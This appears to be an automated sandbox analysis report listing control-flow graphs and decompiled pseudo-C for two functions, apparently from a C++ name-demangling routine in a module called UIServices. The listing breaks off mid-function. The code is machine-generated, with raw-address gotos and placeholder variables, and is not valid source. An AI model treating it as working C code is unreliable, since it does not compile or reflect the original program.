                                                    control_flow_graph 1255 7ffc2356cacc-7ffc2356cb12 1256 7ffc2356cc02-7ffc2356cc05 1255->1256 1257 7ffc2356cb18 1255->1257 1260 7ffc2356cc0b-7ffc2356cc0e 1256->1260 1261 7ffc2356cd86-7ffc2356cdab call 7ffc23568150 1256->1261 1258 7ffc2356cb1e-7ffc2356cb20 1257->1258 1259 7ffc2356cbf8-7ffc2356cbfd call 7ffc235698c8 1257->1259 1264 7ffc2356cbdc-7ffc2356cbf3 1258->1264 1265 7ffc2356cb26-7ffc2356cb29 1258->1265 1269 7ffc2356cf1e-7ffc2356cf45 call 7ffc2356f5b0 1259->1269 1266 7ffc2356cd66-7ffc2356cd73 call 7ffc2356cf48 1260->1266 1267 7ffc2356cc14-7ffc2356cc17 1260->1267 1279 7ffc2356ce0e-7ffc2356ce12 1261->1279 1280 7ffc2356cdad-7ffc2356cdc6 call 7ffc235698c8 call 7ffc23567078 1261->1280 1264->1269 1272 7ffc2356cbd2-7ffc2356cbd7 call 7ffc2356c270 1265->1272 1273 7ffc2356cb2f-7ffc2356cb32 1265->1273 1274 7ffc2356cc2b-7ffc2356cc35 1266->1274 1286 7ffc2356cd79-7ffc2356cd81 call 7ffc2356cacc 1266->1286 1267->1274 1275 7ffc2356cc19-7ffc2356cc1c 1267->1275 1272->1269 1281 7ffc2356cb6b-7ffc2356cb6e 1273->1281 1282 7ffc2356cb34-7ffc2356cb37 1273->1282 1274->1269 1283 7ffc2356cc1e-7ffc2356cc21 1275->1283 1284 7ffc2356cc45-7ffc2356cc55 call 7ffc2356c270 1275->1284 1291 7ffc2356ce18-7ffc2356ce1c 1279->1291 1292 7ffc2356ce99-7ffc2356ceb2 call 7ffc2356c270 call 7ffc23567078 1279->1292 1280->1279 1339 7ffc2356cdc8-7ffc2356cdcc 1280->1339 1289 7ffc2356cba3-7ffc2356cbcd call 7ffc23568150 call 7ffc235698c8 call 7ffc23566f74 1281->1289 1290 7ffc2356cb70-7ffc2356cb9e call 7ffc23566cf4 1281->1290 1294 7ffc2356cb61-7ffc2356cb66 call 7ffc2356d688 1282->1294 1295 7ffc2356cb39-7ffc2356cb3c 1282->1295 1296 7ffc2356cc23-7ffc2356cc29 1283->1296 1297 7ffc2356cc3a-7ffc2356cc40 1283->1297 1312 7ffc2356cc71 1284->1312 1313 7ffc2356cc57-7ffc2356cc6f 1284->1313 1286->1269 1289->1269 1290->1269 1305 7ffc2356ce1e-7ffc2356ce22 1291->1305 1306 7ffc2356ce38-7ffc2356ce51 call 7ffc2356c270 call 7ffc23567078 1291->1306 1319 7ffc2356cefa-7ffc2356cf0a call 7ffc2356c270 call 7ffc23567078 1292->1319 1349 7ffc2356ceb4-7ffc2356ceb8 1292->1349 1294->1269 1307 7ffc2356cb3e-7ffc2356cb44 1295->1307 1308 7ffc2356cb57-7ffc2356cb5c call 7ffc2356c50c 1295->1308 1296->1274 1296->1284 1297->1269 1305->1319 1320 7ffc2356ce28-7ffc2356ce2c 1305->1320 1306->1292 1353 7ffc2356ce53-7ffc2356ce57 1306->1353 1307->1274 1321 7ffc2356cb4a-7ffc2356cb52 call 7ffc2356a314 1307->1321 1308->1269 1325 7ffc2356cc75-7ffc2356cc91 atol 1312->1325 1313->1325 1340 7ffc2356cf0f-7ffc2356cf12 1319->1340 1320->1292 1329 7ffc2356ce2e-7ffc2356ce32 1320->1329 1321->1269 1336 7ffc2356ccc2-7ffc2356ccf1 call 7ffc2356e094 call 7ffc235669ec 1325->1336 1337 7ffc2356cc93-7ffc2356cc9d 1325->1337 1329->1306 1329->1340 1377 7ffc2356ccf3-7ffc2356ccf7 1336->1377 1378 7ffc2356cd5d-7ffc2356cd64 1336->1378 1337->1336 1344 7ffc2356cc9f-7ffc2356ccad 1337->1344 1346 7ffc2356cde2-7ffc2356cdf4 call 7ffc2356aa78 1339->1346 1347 7ffc2356cdce-7ffc2356cde0 call 7ffc23568150 1339->1347 1343 7ffc2356cf16-7ffc2356cf19 call 7ffc23566fa0 1340->1343 1343->1269 1344->1336 1373 7ffc2356ccaf-7ffc2356ccbd call 7ffc235669ec 1344->1373 1368 7ffc2356cdff 1346->1368 1369 7ffc2356cdf6-7ffc2356cdfd 1346->1369 1347->1279 1356 7ffc2356cece-7ffc2356cee0 call 7ffc2356aa78 1349->1356 1357 7ffc2356ceba-7ffc2356cecc call 7ffc23568150 1349->1357 1358 7ffc2356ce6d-7ffc2356ce7f call 7ffc2356aa78 1353->1358 1359 7ffc2356ce59-7ffc2356ce6b call 7ffc23568150 1353->1359 1380 7ffc2356cee2-7ffc2356cee9 1356->1380 1381 7ffc2356ceeb 1356->1381 1357->1319 1385 7ffc2356ce81-7ffc2356ce88 1358->1385 1386 7ffc2356ce8a 1358->1386 1359->1292 1379 7ffc2356ce02-7ffc2356ce09 call 7ffc23566aa0 1368->1379 1369->1379 1373->1269 1377->1378 1383 7ffc2356ccf9-7ffc2356ccfd 1377->1383 1382 7ffc2356cd54-7ffc2356cd5b 1378->1382 1379->1279 1387 7ffc2356ceee-7ffc2356cef5 call 7ffc23566aa0 1380->1387 1381->1387 1389 7ffc2356cd17-7ffc2356cd48 call 7ffc23566cf4 call 7ffc23566f74 1382->1389 1391 7ffc2356ccff-7ffc2356cd03 1383->1391 1392 7ffc2356cd4d 1383->1392 1390 7ffc2356ce8d-7ffc2356ce94 call 7ffc23566aa0 1385->1390 1386->1390 1387->1319 1389->1343 1390->1292 1391->1274 1394 7ffc2356cd09-7ffc2356cd10 1391->1394 1392->1382 1394->1389
                                                    C-Code - Quality: 70%
                                                    			E00007FFC7FFC2356CACC(void* __edi, long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r10, void* __r11, long long _a16, long long _a24) {
                                                    				void* _v40;
                                                    				signed int _v56;
                                                    				void* _v57;
                                                    				char _v64;
                                                    				char _v72;
                                                    				char _v88;
                                                    				intOrPtr _v96;
                                                    				char _v104;
                                                    				char _v112;
                                                    				char _v120;
                                                    				void* __rdi;
                                                    				void* __r12;
                                                    				void* __r14;
                                                    				signed int _t86;
                                                    				char _t115;
                                                    				void* _t116;
                                                    				signed int _t119;
                                                    				void* _t121;
                                                    				void* _t131;
                                                    				void* _t133;
                                                    				intOrPtr _t150;
                                                    				long long* _t156;
                                                    				signed long long _t165;
                                                    				char* _t167;
                                                    				char* _t168;
                                                    				long long _t170;
                                                    				intOrPtr _t175;
                                                    				long long* _t178;
                                                    				long long* _t179;
                                                    				long long* _t180;
                                                    				long long* _t188;
                                                    				intOrPtr* _t190;
                                                    				void* _t221;
                                                    				long long* _t240;
                                                    				long long _t241;
                                                    				void* _t244;
                                                    				void* _t247;
                                                    				void* _t252;
                                                    				void* _t254;
                                                    				void* _t256;
                                                    				void* _t258;
                                                    				void* _t259;
                                                    
                                                    				_t254 = __r11;
                                                    				_t253 = __r10;
                                                    				_t247 = __r8;
                                                    				_t241 = __rsi;
                                                    				_t221 = __rdx;
                                                    				_t185 = __rcx;
                                                    				_t183 = __rbx;
                                                    				_t131 = __edi;
                                                    				_a16 = __rbx;
                                                    				_a24 = __rsi;
                                                    				_t165 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				_v56 = _t165 ^ _t244 - 0x00000070;
                                                    				_t167 =  *0x23574360; // 0x0
                                                    				_t240 = __rcx;
                                                    				_t115 =  *_t167;
                                                    				_t168 = _t167 + 1;
                                                    				 *0x23574360 = _t168;
                                                    				r14d = _t115;
                                                    				_t133 = _t115 - 0x45;
                                                    				if (_t133 > 0) goto 0x2356cc02;
                                                    				if (_t133 == 0) goto 0x2356cbf8;
                                                    				if (_t115 == 0) goto 0x2356cbdc;
                                                    				if (_t115 == 0x30) goto 0x2356cbd2;
                                                    				if (_t115 == 0x31) goto 0x2356cb6b;
                                                    				if (_t115 == 0x32) goto 0x2356cb61;
                                                    				if (_t115 == 0x34) goto 0x2356cb57;
                                                    				_t116 = _t115 - 0x41;
                                                    				if (_t116 - 1 > 0) goto 0x2356cc2b;
                                                    				E00007FFC7FFC2356A314(r14d, __rbx, __rcx, __rsi, __r10);
                                                    				goto 0x2356cf1e;
                                                    				E00007FFC7FFC2356C50C(__rcx);
                                                    				goto 0x2356cf1e;
                                                    				E00007FFC7FFC2356D688(_t121, r14d, _t131, _t183, _t185, _t221, _t240, _t241, _t247, __r10, _t254, _t258);
                                                    				goto 0x2356cf1e;
                                                    				if ( *_t168 != 0x40) goto 0x2356cba3;
                                                    				_v96 = 4;
                                                    				 *0x23574360 = _t168 + 1;
                                                    				_t170 = "NULL";
                                                    				_v104 = _t170;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23566CF4(_t170, _t185,  &_v120);
                                                    				goto 0x2356cf1e;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23568150(0x26, _t170, _t183,  &_v72);
                                                    				E00007FFC7FFC235698C8(_t131,  *_t168 - 0x40, _t170, _t183,  &_v120,  &_v120, _t240, _t241, _t247, _t256);
                                                    				_t188 =  &_v72;
                                                    				E00007FFC7FFC23566F74(_t188, _t240, _t170);
                                                    				goto 0x2356cf1e;
                                                    				E00007FFC7FFC2356C270(_t183, _t188, _t240, _t241, _t170, __r10, _t254, _t258);
                                                    				goto 0x2356cf1e;
                                                    				 *0x23574360 = _t170 - 1;
                                                    				 *_t188 = 0x23571ac0;
                                                    				 *((intOrPtr*)(_t188 + 8)) = 0;
                                                    				goto 0x2356cf1e;
                                                    				E00007FFC7FFC235698C8(_t131,  *_t168 - 0x40, 0x23571ac0, _t183, _t188, _t240, _t240, _t241, _t170, _t256);
                                                    				goto 0x2356cf1e;
                                                    				if (_t116 - 0x4a <= 0) goto 0x2356cd86;
                                                    				if (_t116 == 0x4d) goto 0x2356cd66;
                                                    				if (_t116 == 0x51) goto 0x2356cc2b;
                                                    				if (_t116 == 0x52) goto 0x2356cc45;
                                                    				if (_t116 == 0x53) goto 0x2356cc3a;
                                                    				if (_t116 - 0x54 - 2 <= 0) goto 0x2356cc45;
                                                    				 *((intOrPtr*)(_t240 + 8)) = 0;
                                                    				 *((char*)(_t240 + 8)) = 2;
                                                    				 *_t240 = _t241;
                                                    				goto 0x2356cf1e;
                                                    				 *_t188 = _t241;
                                                    				 *((intOrPtr*)(_t188 + 8)) = 0;
                                                    				goto 0x2356cf1e;
                                                    				E00007FFC7FFC2356C270(_t183,  &_v120, _t240, _t241, _t170, __r10, _t254, _t258);
                                                    				_t190 = _v120;
                                                    				if (_t190 == 0) goto 0x2356cc71;
                                                    				 *0x235701a0();
                                                    				 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x18)))) = sil;
                                                    				goto 0x2356cc75;
                                                    				_v72 = sil;
                                                    				_t86 = atol(??);
                                                    				r15d = 0xfff;
                                                    				if (( *0x23574370 & 0x00004000) == 0) goto 0x2356ccc2;
                                                    				_t175 =  *0x23574378; // 0x0
                                                    				if (_t175 == 0) goto 0x2356ccc2;
                                                    				 *0x235701a0();
                                                    				_t150 = _t175;
                                                    				if (_t150 == 0) goto 0x2356ccc2;
                                                    				r8b = sil;
                                                    				E00007FFC7FFC235669EC(_t240, _t175);
                                                    				goto 0x2356cf1e;
                                                    				_t119 = _t86 & r15d;
                                                    				r9d = _t119;
                                                    				E00007FFC7FFC2356E094(_t86 & r15d, _t175,  &_v72, _t175, "%d", _t252);
                                                    				r8b = sil;
                                                    				E00007FFC7FFC235669EC( &_v104,  &_v72);
                                                    				r14d = r14d - 0x52;
                                                    				if (_t150 == 0) goto 0x2356cd5d;
                                                    				r14d = r14d - 2;
                                                    				if (_t150 == 0) goto 0x2356cd5d;
                                                    				r14d = r14d - 1;
                                                    				if (_t150 == 0) goto 0x2356cd4d;
                                                    				if (r14d != 1) goto 0x2356cc2b;
                                                    				_v112 = 0x1a;
                                                    				_v120 = "`generic-method-parameter-";
                                                    				asm("movaps xmm0, [ebp-0x50]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23566CF4("`generic-method-parameter-",  &_v88,  &_v120);
                                                    				_t251 =  &_v104;
                                                    				E00007FFC7FFC23566F74("`generic-method-parameter-",  &_v120,  &_v104);
                                                    				r8b = 0x27;
                                                    				goto 0x2356cf16;
                                                    				_v112 = 0x19;
                                                    				goto 0x2356cd17;
                                                    				_t178 = "`template-type-parameter-";
                                                    				goto 0x2356cd54;
                                                    				E00007FFC7FFC2356CF48(0x10, _t131, _t183,  &_v120, _t240, _t241,  &_v104, __r10, _t254, _t258);
                                                    				if (_v112 - 1 > 0) goto 0x2356cc2b;
                                                    				E00007FFC7FFC2356CACC(_t131, _t183, _t240,  &_v120, _t241,  &_v104, __r10, _t254);
                                                    				goto 0x2356cf1e;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23568150(0x7b, _t178, _t183,  &_v72);
                                                    				r15d = 0x10;
                                                    				if (_t119 - 0x48 - 2 > 0) goto 0x2356ce0e;
                                                    				E00007FFC7FFC235698C8(_t131, _t119 - 0x48 - 2, _t178, _t183,  &_v88,  &_v120, _t240, _t241,  &_v104, 0x235718e0);
                                                    				E00007FFC7FFC23567078(_t86 & r15d,  &_v72, _t178,  &_v104);
                                                    				if (_v64 - 1 > 0) goto 0x2356ce0e;
                                                    				if (_v72 != _t241) goto 0x2356cde2;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23568150(0x2c, _t178, _t183,  &_v72);
                                                    				goto 0x2356ce0e;
                                                    				E00007FFC7FFC2356AA78(_t178, _t183, 0x23574388, _t259, _t241);
                                                    				_t156 = _t178;
                                                    				if (_t156 == 0) goto 0x2356cdff;
                                                    				 *_t178 = 0x235718e0;
                                                    				 *((char*)(_t178 + 8)) = 0x2c;
                                                    				goto 0x2356ce02;
                                                    				_t179 = _t241;
                                                    				E00007FFC7FFC23566AA0(_t179, _t183,  &_v72, _t179);
                                                    				r14d = r14d - 0x46;
                                                    				if (_t156 == 0) goto 0x2356ce99;
                                                    				r14d = r14d - 1;
                                                    				if (_t156 == 0) goto 0x2356ce38;
                                                    				r14d = r14d - 1;
                                                    				if (_t156 == 0) goto 0x2356cefa;
                                                    				r14d = r14d - 1;
                                                    				if (_t156 == 0) goto 0x2356ce99;
                                                    				if (r14d != 1) goto 0x2356cf0f;
                                                    				E00007FFC7FFC2356C270(_t183,  &_v88, _t179, _t241,  &_v104, __r10, _t254, _t258);
                                                    				E00007FFC7FFC23567078(_t86 & r15d,  &_v72, _t179,  &_v104);
                                                    				if (_v64 - 1 > 0) goto 0x2356ce99;
                                                    				if (_v72 != _t241) goto 0x2356ce6d;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23568150(0x2c, _t179, _t183,  &_v72);
                                                    				goto 0x2356ce99;
                                                    				E00007FFC7FFC2356AA78(_t179, _t183, 0x23574388, _t259, _t241);
                                                    				if (_t179 == 0) goto 0x2356ce8a;
                                                    				 *_t179 = 0x235718e0;
                                                    				 *((char*)(_t179 + 8)) = 0x2c;
                                                    				goto 0x2356ce8d;
                                                    				_t180 = _t241;
                                                    				E00007FFC7FFC23566AA0(_t180, _t183,  &_v72, _t180);
                                                    				E00007FFC7FFC2356C270(_t183,  &_v88, _t180, _t241,  &_v104, __r10, _t254, _t258);
                                                    				E00007FFC7FFC23567078(_t86 & r15d,  &_v72, _t180, _t251);
                                                    				if (_v64 - 1 > 0) goto 0x2356cefa;
                                                    				if (_v72 != _t241) goto 0x2356cece;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23568150(0x2c, _t180, _t183,  &_v72);
                                                    				goto 0x2356cefa;
                                                    				E00007FFC7FFC2356AA78(_t180, _t183, 0x23574388, _t259, _t241);
                                                    				if (_t180 == 0) goto 0x2356ceeb;
                                                    				 *_t180 = 0x235718e0;
                                                    				 *((char*)(_t180 + 8)) = 0x2c;
                                                    				goto 0x2356ceee;
                                                    				E00007FFC7FFC23566AA0(_t241, _t183,  &_v72, _t241);
                                                    				E00007FFC7FFC2356C270(_t183,  &_v88, _t241, _t241, _t251, _t253, _t254, _t258);
                                                    				E00007FFC7FFC23567078(_t86 & r15d,  &_v72, _t241, _t251);
                                                    				r8b = 0x7d;
                                                    				E00007FFC7FFC23566FA0( &_v72, _t240);
                                                    				return E00007FFC7FFC2356F5B0(_t86 & r15d, _t240, _v56 ^ _t244 - 0x00000070, _t240);
                                                    			}













































                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cacc
                                                    0x7ffc2356cad1
                                                    0x7ffc2356cae5
                                                    0x7ffc2356caef
                                                    0x7ffc2356caf3
                                                    0x7ffc2356cafc
                                                    0x7ffc2356caff
                                                    0x7ffc2356cb02
                                                    0x7ffc2356cb05
                                                    0x7ffc2356cb0c
                                                    0x7ffc2356cb0f
                                                    0x7ffc2356cb12
                                                    0x7ffc2356cb18
                                                    0x7ffc2356cb20
                                                    0x7ffc2356cb29
                                                    0x7ffc2356cb32
                                                    0x7ffc2356cb37
                                                    0x7ffc2356cb3c
                                                    0x7ffc2356cb3e
                                                    0x7ffc2356cb44
                                                    0x7ffc2356cb4d
                                                    0x7ffc2356cb52
                                                    0x7ffc2356cb57
                                                    0x7ffc2356cb5c
                                                    0x7ffc2356cb61
                                                    0x7ffc2356cb66
                                                    0x7ffc2356cb6e
                                                    0x7ffc2356cb73
                                                    0x7ffc2356cb7a
                                                    0x7ffc2356cb85
                                                    0x7ffc2356cb8c
                                                    0x7ffc2356cb90
                                                    0x7ffc2356cb94
                                                    0x7ffc2356cb99
                                                    0x7ffc2356cb9e
                                                    0x7ffc2356cba5
                                                    0x7ffc2356cbad
                                                    0x7ffc2356cbb0
                                                    0x7ffc2356cbb9
                                                    0x7ffc2356cbc1
                                                    0x7ffc2356cbc8
                                                    0x7ffc2356cbcd
                                                    0x7ffc2356cbd2
                                                    0x7ffc2356cbd7
                                                    0x7ffc2356cbdf
                                                    0x7ffc2356cbed
                                                    0x7ffc2356cbf0
                                                    0x7ffc2356cbf3
                                                    0x7ffc2356cbf8
                                                    0x7ffc2356cbfd
                                                    0x7ffc2356cc05
                                                    0x7ffc2356cc0e
                                                    0x7ffc2356cc17
                                                    0x7ffc2356cc1c
                                                    0x7ffc2356cc21
                                                    0x7ffc2356cc29
                                                    0x7ffc2356cc2b
                                                    0x7ffc2356cc2e
                                                    0x7ffc2356cc32
                                                    0x7ffc2356cc35
                                                    0x7ffc2356cc3a
                                                    0x7ffc2356cc3d
                                                    0x7ffc2356cc40
                                                    0x7ffc2356cc49
                                                    0x7ffc2356cc4e
                                                    0x7ffc2356cc55
                                                    0x7ffc2356cc66
                                                    0x7ffc2356cc6c
                                                    0x7ffc2356cc6f
                                                    0x7ffc2356cc71
                                                    0x7ffc2356cc79
                                                    0x7ffc2356cc89
                                                    0x7ffc2356cc91
                                                    0x7ffc2356cc93
                                                    0x7ffc2356cc9d
                                                    0x7ffc2356cca4
                                                    0x7ffc2356ccaa
                                                    0x7ffc2356ccad
                                                    0x7ffc2356ccaf
                                                    0x7ffc2356ccb8
                                                    0x7ffc2356ccbd
                                                    0x7ffc2356ccc2
                                                    0x7ffc2356cccc
                                                    0x7ffc2356ccd8
                                                    0x7ffc2356ccdd
                                                    0x7ffc2356cce8
                                                    0x7ffc2356cced
                                                    0x7ffc2356ccf1
                                                    0x7ffc2356ccf3
                                                    0x7ffc2356ccf7
                                                    0x7ffc2356ccf9
                                                    0x7ffc2356ccfd
                                                    0x7ffc2356cd03
                                                    0x7ffc2356cd10
                                                    0x7ffc2356cd17
                                                    0x7ffc2356cd1f
                                                    0x7ffc2356cd27
                                                    0x7ffc2356cd2c
                                                    0x7ffc2356cd31
                                                    0x7ffc2356cd3c
                                                    0x7ffc2356cd41
                                                    0x7ffc2356cd48
                                                    0x7ffc2356cd54
                                                    0x7ffc2356cd5b
                                                    0x7ffc2356cd5d
                                                    0x7ffc2356cd64
                                                    0x7ffc2356cd6a
                                                    0x7ffc2356cd73
                                                    0x7ffc2356cd7c
                                                    0x7ffc2356cd81
                                                    0x7ffc2356cd88
                                                    0x7ffc2356cd90
                                                    0x7ffc2356cd93
                                                    0x7ffc2356cda2
                                                    0x7ffc2356cdab
                                                    0x7ffc2356cdb1
                                                    0x7ffc2356cdbd
                                                    0x7ffc2356cdc6
                                                    0x7ffc2356cdcc
                                                    0x7ffc2356cdd0
                                                    0x7ffc2356cdd8
                                                    0x7ffc2356cddb
                                                    0x7ffc2356cde0
                                                    0x7ffc2356cdec
                                                    0x7ffc2356cdf1
                                                    0x7ffc2356cdf4
                                                    0x7ffc2356cdf6
                                                    0x7ffc2356cdf9
                                                    0x7ffc2356cdfd
                                                    0x7ffc2356cdff
                                                    0x7ffc2356ce09
                                                    0x7ffc2356ce0e
                                                    0x7ffc2356ce12
                                                    0x7ffc2356ce18
                                                    0x7ffc2356ce1c
                                                    0x7ffc2356ce1e
                                                    0x7ffc2356ce22
                                                    0x7ffc2356ce28
                                                    0x7ffc2356ce2c
                                                    0x7ffc2356ce32
                                                    0x7ffc2356ce3c
                                                    0x7ffc2356ce48
                                                    0x7ffc2356ce51
                                                    0x7ffc2356ce57
                                                    0x7ffc2356ce5b
                                                    0x7ffc2356ce63
                                                    0x7ffc2356ce66
                                                    0x7ffc2356ce6b
                                                    0x7ffc2356ce77
                                                    0x7ffc2356ce7f
                                                    0x7ffc2356ce81
                                                    0x7ffc2356ce84
                                                    0x7ffc2356ce88
                                                    0x7ffc2356ce8a
                                                    0x7ffc2356ce94
                                                    0x7ffc2356ce9d
                                                    0x7ffc2356cea9
                                                    0x7ffc2356ceb2
                                                    0x7ffc2356ceb8
                                                    0x7ffc2356cebc
                                                    0x7ffc2356cec4
                                                    0x7ffc2356cec7
                                                    0x7ffc2356cecc
                                                    0x7ffc2356ced8
                                                    0x7ffc2356cee0
                                                    0x7ffc2356cee2
                                                    0x7ffc2356cee5
                                                    0x7ffc2356cee9
                                                    0x7ffc2356cef5
                                                    0x7ffc2356cefe
                                                    0x7ffc2356cf0a
                                                    0x7ffc2356cf0f
                                                    0x7ffc2356cf19
                                                    0x7ffc2356cf45

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                                    • API String ID: 0-4167119577
                                                    • Opcode ID: 7847c438d7b5cd4743e7c19f9e8803edb50d6b73b90e31d0e5b59828e5d8c847
                                                    • Instruction ID: f3bd9953ab25d3afb9d37ea0d8ed75c3c0b79e94153d75848f050743274839ff
                                                    • Opcode Fuzzy Hash: 7847c438d7b5cd4743e7c19f9e8803edb50d6b73b90e31d0e5b59828e5d8c847
                                                    • Instruction Fuzzy Hash: 5BD15B62F18A7A88FB119B60DC451FC27B4FF04784F9440B6DA0E36A9ADE3CA545CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1400 7ffc2356da5c-7ffc2356daa5 1401 7ffc2356daa7-7ffc2356dac0 call 7ffc23566f08 1400->1401 1402 7ffc2356dac5-7ffc2356dacc 1400->1402 1409 7ffc2356dd16-7ffc2356dd41 call 7ffc2356f5b0 1401->1409 1404 7ffc2356db23-7ffc2356db33 1402->1404 1405 7ffc2356dace-7ffc2356daf5 call 7ffc2356c838 1402->1405 1408 7ffc2356db37-7ffc2356db3b 1404->1408 1414 7ffc2356dcd0-7ffc2356dcd3 1405->1414 1415 7ffc2356dafb-7ffc2356db1e 1405->1415 1411 7ffc2356db4c-7ffc2356db54 1408->1411 1412 7ffc2356db3d-7ffc2356db3f 1408->1412 1417 7ffc2356db6a-7ffc2356db74 1411->1417 1418 7ffc2356db56-7ffc2356db68 1411->1418 1412->1411 1416 7ffc2356db41-7ffc2356db4a 1412->1416 1422 7ffc2356dd0f-7ffc2356dd12 1414->1422 1423 7ffc2356dcd5-7ffc2356dcdf 1414->1423 1415->1414 1416->1408 1416->1411 1420 7ffc2356db7a-7ffc2356db7e 1417->1420 1419 7ffc2356dbaf-7ffc2356dbd6 call 7ffc2356c270 1418->1419 1435 7ffc2356dbdc-7ffc2356dbe6 1419->1435 1436 7ffc2356dc77-7ffc2356dc98 call 7ffc23566cf4 call 7ffc23566f74 1419->1436 1424 7ffc2356db80-7ffc2356db82 1420->1424 1425 7ffc2356db8f-7ffc2356db97 1420->1425 1422->1409 1423->1422 1427 7ffc2356dce1-7ffc2356dce4 1423->1427 1424->1425 1428 7ffc2356db84-7ffc2356db8d 1424->1428 1429 7ffc2356db9d-7ffc2356dbab 1425->1429 1430 7ffc2356dc9a-7ffc2356dc9d 1425->1430 1427->1422 1432 7ffc2356dce6-7ffc2356dcfa call 7ffc2356aa78 1427->1432 1428->1420 1428->1425 1429->1419 1433 7ffc2356dc9f-7ffc2356dca3 1430->1433 1434 7ffc2356dcb7-7ffc2356dcc5 call 7ffc23566c44 1430->1434 1432->1422 1446 7ffc2356dcfc-7ffc2356dd0a 1432->1446 1433->1434 1438 7ffc2356dca5-7ffc2356dcb5 1433->1438 1443 7ffc2356dcca-7ffc2356dccd 1434->1443 1435->1436 1440 7ffc2356dbec-7ffc2356dbf3 1435->1440 1453 7ffc2356dc69-7ffc2356dc75 call 7ffc23566fa0 1436->1453 1438->1414 1444 7ffc2356dc16 1440->1444 1445 7ffc2356dbf5-7ffc2356dc14 1440->1445 1443->1414 1449 7ffc2356dc1a-7ffc2356dc32 atol 1444->1449 1445->1449 1446->1422 1454 7ffc2356dc48-7ffc2356dc65 call 7ffc23566cf4 call 7ffc23566f74 1449->1454 1455 7ffc2356dc34-7ffc2356dc43 call 7ffc235669ec 1449->1455 1453->1443 1454->1453 1455->1443
                                                    C-Code - Quality: 73%
                                                    			E00007FFC7FFC2356DA5C(void* __ebx, void* __ecx, void* __edx, void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
                                                    				void* __r14;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t75;
                                                    				intOrPtr _t82;
                                                    				void* _t88;
                                                    				void* _t91;
                                                    				void* _t104;
                                                    				signed long long _t105;
                                                    				intOrPtr* _t107;
                                                    				long long _t108;
                                                    				intOrPtr* _t110;
                                                    				intOrPtr* _t113;
                                                    				long long _t118;
                                                    				intOrPtr _t124;
                                                    				long long _t125;
                                                    				long long _t127;
                                                    				intOrPtr _t130;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr* _t134;
                                                    				intOrPtr* _t137;
                                                    				signed long long _t159;
                                                    				intOrPtr* _t163;
                                                    				void* _t165;
                                                    				void* _t166;
                                                    				void* _t168;
                                                    				void* _t171;
                                                    				char* _t175;
                                                    				intOrPtr* _t176;
                                                    				intOrPtr* _t177;
                                                    				char* _t178;
                                                    				void* _t181;
                                                    				void* _t183;
                                                    				long long* _t184;
                                                    				char* _t186;
                                                    
                                                    				_t181 = __r11;
                                                    				_t171 = __r8;
                                                    				_t162 = __rsi;
                                                    				_t104 = _t168;
                                                    				 *((long long*)(_t104 + 0x10)) = __rbx;
                                                    				 *((long long*)(_t104 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t104 + 0x20)) = __rdi;
                                                    				_t166 = _t104 - 0x5f;
                                                    				_t105 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				 *(_t166 + 0x37) = _t105 ^ _t168 - 0x00000090;
                                                    				_t175 =  *0x23574360; // 0x0
                                                    				r10b = r8b;
                                                    				sil = __edx;
                                                    				_t184 = __rcx;
                                                    				r8d =  *_t175;
                                                    				r8d = r8d + 0xffffffd0;
                                                    				if (r8d - 9 > 0) goto 0x2356dac5;
                                                    				_t176 = _t175 + 1;
                                                    				_t130 =  *0x23574350; // 0x0
                                                    				 *0x23574360 = _t176;
                                                    				E00007FFC7FFC23566F08(_t130, __rcx);
                                                    				goto 0x2356dd16;
                                                    				r15d = 0;
                                                    				if ( *_t176 != 0x3f) goto 0x2356db23;
                                                    				E00007FFC7FFC2356C838(__ebx, __ecx, 0, __edi, __rbx, _t166 - 0x29, __rcx, __rdi, __rsi);
                                                    				_t107 =  *0x23574360; // 0x0
                                                    				_t108 = _t107 + 1;
                                                    				 *0x23574360 = _t108;
                                                    				if ( *_t107 == 0x40) goto 0x2356dcd0;
                                                    				 *0x23574360 = _t108 - 1;
                                                    				asm("sbb edi, edi");
                                                    				_t123 =  !=  ? _t186 : 0x23571ac0;
                                                    				goto 0x2356dcd0;
                                                    				_t110 = "template-parameter-";
                                                    				_t132 = _t176;
                                                    				r8d = 0x12;
